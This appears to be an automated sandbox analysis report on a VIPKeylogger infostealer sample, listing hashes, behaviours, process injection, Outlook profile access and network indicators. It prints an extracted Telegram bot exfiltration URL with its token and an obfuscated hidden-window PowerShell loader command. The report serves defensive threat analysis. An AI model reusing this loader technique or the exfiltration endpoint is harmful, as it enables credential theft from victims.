Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17-12-2024 02:40
Static task: static1

Behavioral task: behavioral1
  Sample: 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe
  Resource: win7-20240708-en

Behavioral task: behavioral2
  Sample: 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe
  Resource: win10v2004-20241007-en

Behavioral task: behavioral3
  Sample: $PLUGINSDIR/nsExec.dll
  Resource: win7-20240903-en

Behavioral task: behavioral4
  Sample: $PLUGINSDIR/nsExec.dll
  Resource: win10v2004-20241007-en
General
Target: 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe
Size: 1.0MB
MD5: 68ad57514cfb4e1cb4529556dbbc9b73
SHA1: 3681d090c965cd8af1c7bffd6fe5427e997daa41
SHA256: 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac
SHA512: f2ef34f8ad5282676bdc3913007d471cc59e1bf20c5371817b3c85a2c24c19983d3c6c2f5e00bb539fc6596a0b02b4a33e59a4391a4165c22e0cbf2edd103f5a
SSDEEP: 24576:ENrNYo6GP6fzfqUC1tkth3VwV5k7j5awX300zQUGtZq:U+S6fziUC1wh3VwXgj5aEkHUGtZq
Malware Config
Extracted: vipkeylogger
URL: https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendMessage?chat_id=7763958191
Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

Vipkeylogger family

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run Powershell and hide display window.
  pid | Process
  848 | powershell.exe

Loads dropped DLL (1 IoCs)
  pid  | Process
  2304 | 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe

Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe

Blocklisted process makes network request (8 IoCs)
  flow | pid  | Process
  34   | 3480 | msiexec.exe
  36   | 3480 | msiexec.exe
  38   | 3480 | msiexec.exe
  40   | 3480 | msiexec.exe
  44   | 3480 | msiexec.exe
  47   | 3480 | msiexec.exe
  50   | 3480 | msiexec.exe
  55   | 3480 | msiexec.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow | ioc
  33   | drive.google.com
  34   | drive.google.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  46   | checkip.dyndns.org

Drops file in System32 directory (1 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\SysWOW64\stilhederne\tamtammens.ini | 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  pid  | Process
  3480 | msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid  | Process
  848  | powershell.exe
  3480 | msiexec.exe

Drops file in Program Files directory (1 IoCs)
  description | ioc | Process
  File opened for modification | C:\Program Files (x86)\Common Files\inddatafunktionens.Tra | 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid  | Process
  848  | powershell.exe
  848  | powershell.exe
  848  | powershell.exe
  848  | powershell.exe
  848  | powershell.exe
  848  | powershell.exe
  848  | powershell.exe
  3480 | msiexec.exe
  3480 | msiexec.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
  pid | Process
  848 | powershell.exe

Suspicious use of AdjustPrivilegeToken (23 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 848 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 848 | powershell.exe
  Token: SeSecurityPrivilege | 848 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 848 | powershell.exe
  Token: SeLoadDriverPrivilege | 848 | powershell.exe
  Token: SeSystemProfilePrivilege | 848 | powershell.exe
  Token: SeSystemtimePrivilege | 848 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 848 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 848 | powershell.exe
  Token: SeCreatePagefilePrivilege | 848 | powershell.exe
  Token: SeBackupPrivilege | 848 | powershell.exe
  Token: SeRestorePrivilege | 848 | powershell.exe
  Token: SeShutdownPrivilege | 848 | powershell.exe
  Token: SeDebugPrivilege | 848 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 848 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 848 | powershell.exe
  Token: SeUndockPrivilege | 848 | powershell.exe
  Token: SeManageVolumePrivilege | 848 | powershell.exe
  Token: 33 | 848 | powershell.exe
  Token: 34 | 848 | powershell.exe
  Token: 35 | 848 | powershell.exe
  Token: 36 | 848 | powershell.exe
  Token: SeDebugPrivilege | 3480 | msiexec.exe

Suspicious use of WriteProcessMemory (7 IoCs)
  description | pid | Process | procid_target
  PID 2304 wrote to memory of 848 | 2304 | 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe | 88
  PID 2304 wrote to memory of 848 | 2304 | 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe | 88
  PID 2304 wrote to memory of 848 | 2304 | 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe | 88
  PID 848 wrote to memory of 3480 | 848 | powershell.exe | 97
  PID 848 wrote to memory of 3480 | 848 | powershell.exe | 97
  PID 848 wrote to memory of 3480 | 848 | powershell.exe | 97
  PID 848 wrote to memory of 3480 | 848 | powershell.exe | 97

outlook_office_path (1 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe

outlook_win_path (1 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Processes

C:\Users\Admin\AppData\Local\Temp\4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac.exe"
  PID: 2304
  - Loads dropped DLL
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\Admin\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
    PID: 848
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\msiexec.exe
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      PID: 3480
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 290KB
MD5: ac443ed3bcda8fd27eab8e4719631588
SHA1: 6e501a1d2959a2279c67ff2b635950b72c537df8
SHA256: 050e2941abcf6621568720f75c7d27b1bc7b57f4a2db95dd44701aab68996042
SHA512: f4e6440cecee0b5c2197e1f77757501b45cfa1fb14389944b3f775e5611accf946a1d6625e8758592636f26f05f41aed7309de4b6cae22cb1a3b8d18730df69c

Filesize: 69KB
MD5: 5c166ac0df5b33d27a3157ff3484b1d8
SHA1: 14f38ae3f4ed43ab6f47cad5859e4494408092c5
SHA256: c1203a1fc75a7592b8916f61c403ca3eebed1b1d84cd3c7eaa89187ee665229c
SHA512: 89a6e8a42ac4fc4b8618c3e79300126e49128c238e91f557a573edd7905a8fb35cb601e422b0a55ee74ccbb274e228314cf27741e8b3b70b532d3980328e89b1

Filesize: 7KB
MD5: 675c4948e1efc929edcabfe67148eddd
SHA1: f5bdd2c4329ed2732ecfe3423c3cc482606eb28e
SHA256: 1076ca39c449ed1a968021b76ef31f22a5692dfafeea29460e8d970a63c59906
SHA512: 61737021f86f54279d0a4e35db0d0808e9a55d89784a31d597f2e4b65b7bbeec99aa6c79d65258259130eeda2e5b2820f4f1247777a3010f2dc53e30c612a683